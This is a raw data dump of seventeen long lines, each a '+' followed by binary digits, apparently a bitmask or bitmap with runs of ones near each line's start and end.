+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111110000000000000000111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001110100101011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100100000000000000000000000000000000000000000000000000000000000000000000000000010110110101110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000001100110101001110111111111111111111111111111111111111111111111111 